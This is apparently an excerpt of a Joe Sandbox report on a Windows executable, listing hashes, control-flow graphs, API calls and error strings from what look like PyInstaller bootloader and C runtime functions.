                                                                                                                                                                                                                          • Opcode ID: 37c75c647de740c4d03e434983ba542f23ef98c0d39288f6f50529afbb256bed
                                                                                                                                                                                                                          • Instruction ID: 231f5f990c2747ca0ca421a5b9cad106b83facad08287ab100b52cf27bfd64b7
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 37c75c647de740c4d03e434983ba542f23ef98c0d39288f6f50529afbb256bed
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: EC41A221A1C9C291EBB2BB64E4445F963E0FBA4764F400632D99DC36E5DF3DD64B8B00
                                                                                                                                                                                                                          Function 00007FF641F285A0 Relevance: 3.0, APIs: 2, Instructions: 29COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000014.00000002.2284270534.00007FF641F21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF641F20000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284234807.00007FF641F20000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284310577.00007FF641F4B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284344621.00007FF641F5E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284344621.00007FF641F64000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284401010.00007FF641F66000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_20_2_7ff641f20000_58B.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Find$CloseFileFirst
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2295610775-0
                                                                                                                                                                                                                          • Opcode ID: ca66ee6ee850f25a53d0c9653a43f1313d0231bc46844eb151e3c2d0b1a3e355
                                                                                                                                                                                                                          • Instruction ID: 8084565eab56df56823934c87426674299e02a15cbe342ca9b576c64752de490
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ca66ee6ee850f25a53d0c9653a43f1313d0231bc46844eb151e3c2d0b1a3e355
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B2F0C872A1C68186F7F1BF60B4483A673D0BB84328F440335D96D436D4CF3CD45A8A04
                                                                                                                                                                                                                          Function 00007FF641F3FBD8 Relevance: 2.0, APIs: 1, Instructions: 461COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000014.00000002.2284270534.00007FF641F21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF641F20000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284234807.00007FF641F20000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284310577.00007FF641F4B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284344621.00007FF641F5E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284344621.00007FF641F64000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284401010.00007FF641F66000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_20_2_7ff641f20000_58B.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CurrentFeaturePresentProcessProcessor
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1010374628-0
                                                                                                                                                                                                                          • Opcode ID: 7ec5ba8ba8d84894c78f47bcf90823e76b6646eea6f6fc66034cda668971a161
                                                                                                                                                                                                                          • Instruction ID: 92782482b31082df342b65508bdadee5e477685243cc76919744eab178cc1caa
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7ec5ba8ba8d84894c78f47bcf90823e76b6646eea6f6fc66034cda668971a161
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2E029121B1DA8B41FBD7BB26A5152B926C0BF51B90F484635DD6EC7BD2DE3CA4438302
                                                                                                                                                                                                                          Function 00007FF641F218F0 Relevance: 22.9, APIs: 2, Strings: 11, Instructions: 172COMMON
                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                          control_flow_graph 179 7ff641f218f0-7ff641f2192b call 7ff641f23f70 182 7ff641f21bc1-7ff641f21be5 call 7ff641f2b870 179->182 183 7ff641f21931-7ff641f21971 call 7ff641f276a0 179->183 188 7ff641f21977-7ff641f21987 call 7ff641f2f9f4 183->188 189 7ff641f21bae-7ff641f21bb1 call 7ff641f2f36c 183->189 194 7ff641f21989-7ff641f2199c call 7ff641f22760 188->194 195 7ff641f219a1-7ff641f219bd call 7ff641f2f6bc 188->195 192 7ff641f21bb6-7ff641f21bbe 189->192 192->182 194->189 200 7ff641f219d7-7ff641f219ec call 7ff641f34154 195->200 201 7ff641f219bf-7ff641f219d2 call 7ff641f22760 195->201 206 7ff641f21a06-7ff641f21a87 call 7ff641f21bf0 * 2 call 7ff641f2f9f4 200->206 207 7ff641f219ee-7ff641f21a01 call 7ff641f22760 200->207 201->189 215 7ff641f21a8c-7ff641f21a9f call 7ff641f34170 206->215 207->189 218 7ff641f21ab9-7ff641f21ad2 call 7ff641f2f6bc 215->218 219 7ff641f21aa1-7ff641f21ab4 call 7ff641f22760 215->219 224 7ff641f21aec-7ff641f21b08 call 7ff641f2f430 218->224 225 7ff641f21ad4-7ff641f21ae7 call 7ff641f22760 218->225 219->189 230 7ff641f21b1b-7ff641f21b29 224->230 231 7ff641f21b0a-7ff641f21b16 call 7ff641f225f0 224->231 225->189 230->189 233 7ff641f21b2f-7ff641f21b3e 230->233 231->189 235 7ff641f21b40-7ff641f21b46 233->235 236 7ff641f21b48-7ff641f21b55 235->236 237 7ff641f21b60-7ff641f21b6f 235->237 238 7ff641f21b71-7ff641f21b7a 236->238 237->237 237->238 239 7ff641f21b7c-7ff641f21b7f 238->239 240 7ff641f21b8f 238->240 239->240 241 7ff641f21b81-7ff641f21b84 239->241 242 7ff641f21b91-7ff641f21bac 240->242 241->240 243 7ff641f21b86-7ff641f21b89 241->243 242->189 242->235 243->240 244 7ff641f21b8b-7ff641f21b8d 243->244 244->242
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000014.00000002.2284270534.00007FF641F21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF641F20000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284234807.00007FF641F20000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284310577.00007FF641F4B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284344621.00007FF641F5E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284344621.00007FF641F64000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284401010.00007FF641F66000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_20_2_7ff641f20000_58B.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: _fread_nolock$Message
                                                                                                                                                                                                                          • String ID: Could not allocate buffer for TOC!$Could not allocate memory for archive structure!$Could not read full TOC!$Error on file.$Failed to read cookie!$Failed to seek to cookie position!$MEI$calloc$fread$fseek$malloc
                                                                                                                                                                                                                          • API String ID: 677216364-3497178890
                                                                                                                                                                                                                          • Opcode ID: a1cc3dfbf880b2008027c75c4616b01fcb92313a166ef75d694093243fe494ea
                                                                                                                                                                                                                          • Instruction ID: 3b6ab993f6dffb2c468912170d2ec60f7662f00a4ea3d6d648ff767d9f0be917
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a1cc3dfbf880b2008027c75c4616b01fcb92313a166ef75d694093243fe494ea
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D271AC31A1C6C685EBA2FB64E5502F923E0FB58784F444131E98DC77DAEF2EE5468B04
                                                                                                                                                                                                                          Function 00007FF641F215C0 Relevance: 22.9, APIs: 1, Strings: 12, Instructions: 137COMMON
                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                          control_flow_graph 245 7ff641f215c0-7ff641f215d1 246 7ff641f215f7-7ff641f21611 call 7ff641f23f70 245->246 247 7ff641f215d3-7ff641f215dc call 7ff641f21050 245->247 252 7ff641f2163b-7ff641f21655 call 7ff641f23f70 246->252 253 7ff641f21613-7ff641f2163a call 7ff641f22760 246->253 254 7ff641f215ee-7ff641f215f6 247->254 255 7ff641f215de-7ff641f215e9 call 7ff641f225f0 247->255 261 7ff641f21657-7ff641f2166c call 7ff641f225f0 252->261 262 7ff641f21671-7ff641f21688 call 7ff641f2f9f4 252->262 255->254 267 7ff641f217c5-7ff641f217c8 call 7ff641f2f36c 261->267 268 7ff641f216ab-7ff641f216af 262->268 269 7ff641f2168a-7ff641f216a6 call 7ff641f22760 262->269 275 7ff641f217cd-7ff641f217df 267->275 271 7ff641f216c9-7ff641f216e9 call 7ff641f34170 268->271 272 7ff641f216b1-7ff641f216bd call 7ff641f211f0 268->272 278 7ff641f217bd-7ff641f217c0 call 7ff641f2f36c 269->278 282 7ff641f216eb-7ff641f21707 call 7ff641f22760 271->282 283 7ff641f2170c-7ff641f21717 271->283 279 7ff641f216c2-7ff641f216c4 272->279 278->267 279->278 290 7ff641f217b3-7ff641f217b8 282->290 285 7ff641f217a6-7ff641f217ae call 7ff641f3415c 283->285 286 7ff641f2171d-7ff641f21726 283->286 285->290 289 7ff641f21730-7ff641f21752 call 7ff641f2f6bc 286->289 294 7ff641f21785-7ff641f2178c 289->294 295 7ff641f21754-7ff641f2176c call 7ff641f2fdfc 289->295 290->278 297 7ff641f21793-7ff641f2179c call 7ff641f22760 294->297 300 7ff641f2176e-7ff641f21771 295->300 301 7ff641f21775-7ff641f21783 295->301 304 7ff641f217a1 297->304 300->289 303 7ff641f21773 300->303 301->297 303->304 304->285
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000014.00000002.2284270534.00007FF641F21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF641F20000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284234807.00007FF641F20000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284310577.00007FF641F4B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284344621.00007FF641F5E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284344621.00007FF641F64000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284401010.00007FF641F66000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_20_2_7ff641f20000_58B.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Message
                                                                                                                                                                                                                          • String ID: Failed to create symbolic link %s!$Failed to extract %s: failed to allocate temporary buffer!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to open target file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$Failed to extract %s: failed to write data chunk!$fopen$fread$fseek$fwrite$malloc
                                                                                                                                                                                                                          • API String ID: 2030045667-1550345328
                                                                                                                                                                                                                          • Opcode ID: adbc31a2fe2fde7fb3735bf1b18c6ca33e7db29dbdacf29e2c2b8f7993e137ca
                                                                                                                                                                                                                          • Instruction ID: 8ee70d0e2dae07c0423f845617d93289573fbec97590db296570b064e35155df
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: adbc31a2fe2fde7fb3735bf1b18c6ca33e7db29dbdacf29e2c2b8f7993e137ca
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 65518B61B1C68392EB92BB55A9101F923E0BF94B94F444131ED0D87AD6EF3DE5478308
                                                                                                                                                                                                                          Function 00007FF641F27FC0 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 89processsynchronizationCOMMON
                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000014.00000002.2284270534.00007FF641F21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF641F20000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284234807.00007FF641F20000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284310577.00007FF641F4B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284344621.00007FF641F5E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284344621.00007FF641F64000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284401010.00007FF641F66000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_20_2_7ff641f20000_58B.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Process_invalid_parameter_noinfo$ByteCharCodeCommandConsoleCreateCtrlExitHandlerInfoLineMultiObjectSingleStartupWaitWide
                                                                                                                                                                                                                          • String ID: CreateProcessW$Failed to create child process!
                                                                                                                                                                                                                          • API String ID: 2895956056-699529898
                                                                                                                                                                                                                          • Opcode ID: 2d8580ce5d81a01d0f8683f73fef31206a84e7faf833a053d17f215ed92b6c27
                                                                                                                                                                                                                          • Instruction ID: 57b67ccf67a1b19d9195e389db8599db1cbdb497864a9edabc63cde0a05064e2
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2d8580ce5d81a01d0f8683f73fef31206a84e7faf833a053d17f215ed92b6c27
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 89413D31A1CB8681DB61BB64E4452AA73E1FB94360F500335E6AD83BD5DF7CD0468B01
                                                                                                                                                                                                                          Function 00007FF641F211F0 Relevance: 12.4, APIs: 1, Strings: 6, Instructions: 154COMMON
                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000014.00000002.2284270534.00007FF641F21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF641F20000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284234807.00007FF641F20000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284310577.00007FF641F4B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284344621.00007FF641F5E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284344621.00007FF641F64000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284401010.00007FF641F66000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_20_2_7ff641f20000_58B.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Message
                                                                                                                                                                                                                          • String ID: 1.3.1$Failed to extract %s: decompression resulted in return code %d!$Failed to extract %s: failed to allocate temporary input buffer!$Failed to extract %s: failed to allocate temporary output buffer!$Failed to extract %s: inflateInit() failed with return code %d!$malloc
                                                                                                                                                                                                                          • API String ID: 2030045667-2813020118
                                                                                                                                                                                                                          • Opcode ID: bb86d4b09916ff62f83bc664640a5bb88bf9c2c6ab5ccf9a34b792e00a5b311f
                                                                                                                                                                                                                          • Instruction ID: c312a6d2c1767073aede0e2e19b850bd1955c0469c60c5991906d2070224f392
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: bb86d4b09916ff62f83bc664640a5bb88bf9c2c6ab5ccf9a34b792e00a5b311f
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7B51BF62A0C68281EBA2BB95A8503FA62D1BB85794F444135ED4DC7BD6EF3DE9038704
                                                                                                                                                                                                                          Function 00007FF641F3E020 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 117libraryloaderCOMMONLIBRARYCODE
                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • FreeLibrary.KERNEL32(?,?,?,00007FF641F3E3BA,?,?,-00000018,00007FF641F3A063,?,?,?,00007FF641F39F5A,?,?,?,00007FF641F3524E), ref: 00007FF641F3E19C
                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,?,?,00007FF641F3E3BA,?,?,-00000018,00007FF641F3A063,?,?,?,00007FF641F39F5A,?,?,?,00007FF641F3524E), ref: 00007FF641F3E1A8
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000014.00000002.2284270534.00007FF641F21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF641F20000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284234807.00007FF641F20000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284310577.00007FF641F4B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284344621.00007FF641F5E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284344621.00007FF641F64000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284401010.00007FF641F66000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_20_2_7ff641f20000_58B.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: AddressFreeLibraryProc
                                                                                                                                                                                                                          • String ID: api-ms-$ext-ms-
                                                                                                                                                                                                                          • API String ID: 3013587201-537541572
                                                                                                                                                                                                                          • Opcode ID: 400d167c79677b3a1b331b2dd1a2c4ed1cd7dec94f3cf9f9612a621c3bffedbb
                                                                                                                                                                                                                          • Instruction ID: 5e78e2612ef6a5baa1b3e86634168ebf7101213be96f47287991743ce728c4d3
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 400d167c79677b3a1b331b2dd1a2c4ed1cd7dec94f3cf9f9612a621c3bffedbb
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F5418932B1DA0681EB97BB16AD006A662D2BF45BA0F484135DD1DC7BC6EE3DE4478205
                                                                                                                                                                                                                          Function 00007FF641F27C40 Relevance: 12.4, APIs: 2, Strings: 5, Instructions: 116COMMON
                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetTempPathW.KERNEL32(?,?,FFFFFFFF,00007FF641F23834), ref: 00007FF641F27CE4
                                                                                                                                                                                                                          • CreateDirectoryW.KERNELBASE(?,?,FFFFFFFF,00007FF641F23834), ref: 00007FF641F27D2C
                                                                                                                                                                                                                            • Part of subcall function 00007FF641F27E10: GetEnvironmentVariableW.KERNEL32(00007FF641F2365F), ref: 00007FF641F27E47
                                                                                                                                                                                                                            • Part of subcall function 00007FF641F27E10: ExpandEnvironmentStringsW.KERNEL32 ref: 00007FF641F27E69
                                                                                                                                                                                                                            • Part of subcall function 00007FF641F37548: _invalid_parameter_noinfo.LIBCMT ref: 00007FF641F37561
                                                                                                                                                                                                                            • Part of subcall function 00007FF641F226C0: MessageBoxW.USER32 ref: 00007FF641F22736
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000014.00000002.2284270534.00007FF641F21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF641F20000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284234807.00007FF641F20000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284310577.00007FF641F4B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284344621.00007FF641F5E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284344621.00007FF641F64000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284401010.00007FF641F66000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_20_2_7ff641f20000_58B.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Environment$CreateDirectoryExpandMessagePathStringsTempVariable_invalid_parameter_noinfo
                                                                                                                                                                                                                          • String ID: LOADER: failed to set the TMP environment variable.$LOADER: length of teporary directory path exceeds maximum path length!$TMP$TMP$_MEI%d
                                                                                                                                                                                                                          • API String ID: 740614611-1339014028
                                                                                                                                                                                                                          • Opcode ID: 11860e683bfeec2df00dcc2c56da5dbb6591d5702bb717516bbb2bb41ff9b0e3
                                                                                                                                                                                                                          • Instruction ID: d7863684b3334d31b785ec8593a6861d63c60f856549600d73d5405be4ceeb65
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 11860e683bfeec2df00dcc2c56da5dbb6591d5702bb717516bbb2bb41ff9b0e3
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 04418021B1DA8641EBE3BB6199652F922D1AFA5780F804131DD1DC7BD6EE3DE5078200
                                                                                                                                                                                                                          Function 00007FF641F3AD6C Relevance: 10.8, APIs: 7, Instructions: 290COMMONLIBRARYCODE
                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                          control_flow_graph 572 7ff641f3ad6c-7ff641f3ad92 573 7ff641f3adad-7ff641f3adb1 572->573 574 7ff641f3ad94-7ff641f3ada8 call 7ff641f343d4 call 7ff641f343f4 572->574 576 7ff641f3b187-7ff641f3b193 call 7ff641f343d4 call 7ff641f343f4 573->576 577 7ff641f3adb7-7ff641f3adbe 573->577 592 7ff641f3b19e 574->592 594 7ff641f3b199 call 7ff641f39bf0 576->594 577->576 580 7ff641f3adc4-7ff641f3adf2 577->580 580->576 581 7ff641f3adf8-7ff641f3adff 580->581 584 7ff641f3ae18-7ff641f3ae1b 581->584 585 7ff641f3ae01-7ff641f3ae13 call 7ff641f343d4 call 7ff641f343f4 581->585 590 7ff641f3ae21-7ff641f3ae27 584->590 591 7ff641f3b183-7ff641f3b185 584->591 585->594 590->591 596 7ff641f3ae2d-7ff641f3ae30 590->596 595 7ff641f3b1a1-7ff641f3b1b8 591->595 592->595 594->592 596->585 599 7ff641f3ae32-7ff641f3ae57 596->599 601 7ff641f3ae59-7ff641f3ae5b 599->601 602 7ff641f3ae8a-7ff641f3ae91 599->602 605 7ff641f3ae5d-7ff641f3ae64 601->605 606 7ff641f3ae82-7ff641f3ae88 601->606 603 7ff641f3ae66-7ff641f3ae7d call 7ff641f343d4 call 7ff641f343f4 call 7ff641f39bf0 602->603 604 7ff641f3ae93-7ff641f3aebb call 7ff641f3c90c call 7ff641f39c58 * 2 602->604 633 7ff641f3b010 603->633 635 7ff641f3aed8-7ff641f3af03 call 7ff641f3b594 604->635 636 7ff641f3aebd-7ff641f3aed3 call 7ff641f343f4 call 7ff641f343d4 604->636 605->603 605->606 607 7ff641f3af08-7ff641f3af1f 606->607 610 7ff641f3af9a-7ff641f3afa4 call 7ff641f42c2c 607->610 611 7ff641f3af21-7ff641f3af29 607->611 622 7ff641f3afaa-7ff641f3afbf 610->622 623 7ff641f3b02e 610->623 611->610 614 7ff641f3af2b-7ff641f3af2d 611->614 614->610 620 7ff641f3af2f-7ff641f3af45 614->620 620->610 625 7ff641f3af47-7ff641f3af53 620->625 622->623 627 7ff641f3afc1-7ff641f3afd3 GetConsoleMode 622->627 631 7ff641f3b033-7ff641f3b053 ReadFile 623->631 625->610 629 7ff641f3af55-7ff641f3af57 625->629 627->623 632 7ff641f3afd5-7ff641f3afdd 627->632 629->610 634 7ff641f3af59-7ff641f3af71 629->634 637 7ff641f3b059-7ff641f3b061 631->637 638 7ff641f3b14d-7ff641f3b156 GetLastError 631->638 632->631 641 7ff641f3afdf-7ff641f3b001 ReadConsoleW 632->641 644 7ff641f3b013-7ff641f3b01d call 7ff641f39c58 633->644 634->610 645 7ff641f3af73-7ff641f3af7f 634->645 635->607 636->633 637->638 639 7ff641f3b067 637->639 642 7ff641f3b158-7ff641f3b16e call 7ff641f343f4 call 7ff641f343d4 638->642 643 7ff641f3b173-7ff641f3b176 638->643 647 7ff641f3b06e-7ff641f3b083 639->647 649 7ff641f3b003 GetLastError 641->649 650 7ff641f3b022-7ff641f3b02c 641->650 642->633 654 7ff641f3b009-7ff641f3b00b call 7ff641f34368 643->654 655 7ff641f3b17c-7ff641f3b17e 643->655 644->595 645->610 653 7ff641f3af81-7ff641f3af83 645->653 647->644 657 7ff641f3b085-7ff641f3b090 647->657 649->654 650->647 653->610 661 7ff641f3af85-7ff641f3af95 653->661 654->633 655->644 664 7ff641f3b0b7-7ff641f3b0bf 657->664 665 7ff641f3b092-7ff641f3b0ab call 7ff641f3a984 657->665 661->610 668 7ff641f3b13b-7ff641f3b148 call 7ff641f3a7c4 664->668 669 7ff641f3b0c1-7ff641f3b0d3 664->669 672 7ff641f3b0b0-7ff641f3b0b2 665->672 668->672 673 7ff641f3b12e-7ff641f3b136 669->673 674 7ff641f3b0d5 669->674 672->644 673->644 676 7ff641f3b0da-7ff641f3b0e1 674->676 677 7ff641f3b11d-7ff641f3b128 676->677 678 7ff641f3b0e3-7ff641f3b0e7 676->678 677->673 679 7ff641f3b0e9-7ff641f3b0f0 678->679 680 7ff641f3b103 678->680 679->680 681 7ff641f3b0f2-7ff641f3b0f6 679->681 682 7ff641f3b109-7ff641f3b119 680->682 681->680 684 7ff641f3b0f8-7ff641f3b101 681->684 682->676 683 7ff641f3b11b 682->683 683->673 684->682
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000014.00000002.2284270534.00007FF641F21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF641F20000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284234807.00007FF641F20000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284310577.00007FF641F4B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284344621.00007FF641F5E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284344621.00007FF641F64000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284401010.00007FF641F66000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_20_2_7ff641f20000_58B.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3215553584-0
                                                                                                                                                                                                                          • Opcode ID: 7e4b6968f21da67f115f2b5899b729ebe27c21aa0167ab1df282e77588440d71
                                                                                                                                                                                                                          • Instruction ID: 101781c4f2b699e765868135dd38c4f1c1251a900781384f408d35ba28d4b7ec
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7e4b6968f21da67f115f2b5899b729ebe27c21aa0167ab1df282e77588440d71
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 89C1F172A1C68F91EBA2BB5594102BE7BD0FB90B80F550131DA4E83BD1CE7CE8578316
